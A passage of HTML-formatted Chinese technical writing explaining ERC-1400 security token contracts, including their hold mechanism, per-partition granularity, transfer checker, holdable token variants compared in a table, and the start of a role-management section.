none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Hold 功能允许在不实际转移代币的情况下锁定资金，其实现核心是一个精心设计的状态机和三层余额追踪系统。Hold 状态机定义了六种可能的状态，每种状态对应不同的业务含义和操作权限。</span></span></p></b></p><p style="margin-bottom: 0px;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.1.4 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">分区粒度控制的精细化管理</span></span><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400TokensValidator 与 ERC1400 的粒度(Granularity) 不同，其支持为每个 partition 单独设置。这允许同一代币合约下的不同类型证券拥有不同的最小交易单位，完美映射了传统市场中“手”(Lot Size) 的概念。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.2 ERC1400TokensChecker - 转账检查器</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400TokensChecker 提供了一个纯查询(View) 接口，用于在不消耗 Gas 执行交易的情况下，模拟并返回交易的可行性结果。</span></span></p><ul class="list-paddingleft-1"></ul><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.3 ERC20HoldableToken - 简化版的 Hold 实现 </span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对于不需要复杂分区结构，但仍需资金锁定功能的场景，ERC20HoldableToken 提供了一个轻量级选择。完全兼容 ERC20，并通过重写 ERC20 的核心逻辑，引入了 spendableBalance（可用余额）的账本概念。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">3.4 ERC1400HoldableToken 和 ERC1400HoldableCertificateToken</span></span><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> - </span></span><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">组装式代币合约</span></span></p><h5 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.4.1 ERC1400HoldableToken - 标准合规型 </span></span></h5><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400HoldableToken 适用于大多数需要 KYC/AML 但不需要每笔交易实时签名的场景。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">特点：只有身份准入（白名单）。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">配置：在构造函数中，它向 Validator 注册时，将 certificateActivated 设置为 None，但开启了 allowlist、blocklist 和 holds。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">3.4.2 ERC1400HoldableCertificateToken - 强监管型</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC1400HoldableCertificateToken 适用于监管极其严格、需要对每一笔二级市场交易进行实时审查的场景。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">特点：交易即审查。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">配置：支持 NonceBased 或 SaltBased 证书模式，并需要设置 certificateSigner 地址。</span></span></p><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;margin-bottom: 24px;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">对比总结：</span></span></p><table style="width: 538px;"><tbody><tr><td data-colwidth="88"></td><td data-colwidth="145"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">ERC20HoldableToken</span></span></p></td><td data-colwidth="161"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">ERC1400HoldableToken</span></span></p></td><td data-colwidth="144"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">ERC1400HoldableCertificateToken</span></span></p></td></tr><tr><td data-colwidth="88"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">准入机制</span></span></p></td><td data-colwidth="145"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">无内置白名单（依赖外部控制）</span></span></p></td><td data-colwidth="161"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">静态黑白名单</span></span></p></td><td data-colwidth="144"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">动态证书 (Certificate) + 黑白名单</span></span></p></td></tr><tr><td data-colwidth="88"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">交易体验</span></span></p></td><td data-colwidth="145"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">标准 ERC20，无额外参数</span></span></p></td><td data-colwidth="161"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">标准转账接口，无需额外参数</span></span></p></td><td data-colwidth="144"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">需前端申请签名，data 带证书</span></span></p></td></tr><tr><td data-colwidth="88"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">监管粒度</span></span></p></td><td data-colwidth="145"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">资金级（Hold/Release）</span></span></p></td><td data-colwidth="161"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">账户级 + 分区粒度</span></span></p></td><td data-colwidth="144"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">交易级（逐笔审查）</span></span></p></td></tr><tr><td data-colwidth="88"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">适用场景</span></span></p></td><td data-colwidth="145"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">支付结算、简单质押、DVP 资金端</span></span></p></td><td data-colwidth="161"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">员工权益、私募股权、会员通证</span></span></p></td><td data-colwidth="144"><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: center;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">跨境发行、受限股、ST/RWA 严监管</span></span></p></td></tr></tbody></table><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">场景选型指南：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数字法币与支付结算(Digital Fiat &amp; Payment Settlement)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SPV 架构下的私募股权(Private Equity via SPV)</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">受监管的公开分销证券(Regulated Public Distribution)</span></span></p></li></ul><h3 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4、角色管理模块</span></span></h3><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">ERC-1400 的角色管理体系并非平铺直叙，而是构建了一个立体分层的权限治理模型。</span></span></p><h4 dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">4.1 核心治理层：所有者与控制者 </span></span></h4><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是系统的&#34;大脑&#34;，负责制定规则和处理例外情况。</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">合约所有者(Owner)</span></span></p></li><ul class="list-paddingleft-1"><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">职责：作为合约的最高管理者，Owner 拥有设置系统参数的终极权限。</span></span></p></li><li><p dir="ltr" style="margin-top: 12pt;text-indent: 0px;line-height: 25.6px;text-align: left;" role="presentation"><span leaf="" style="white-space: pre-wrap;font-style: 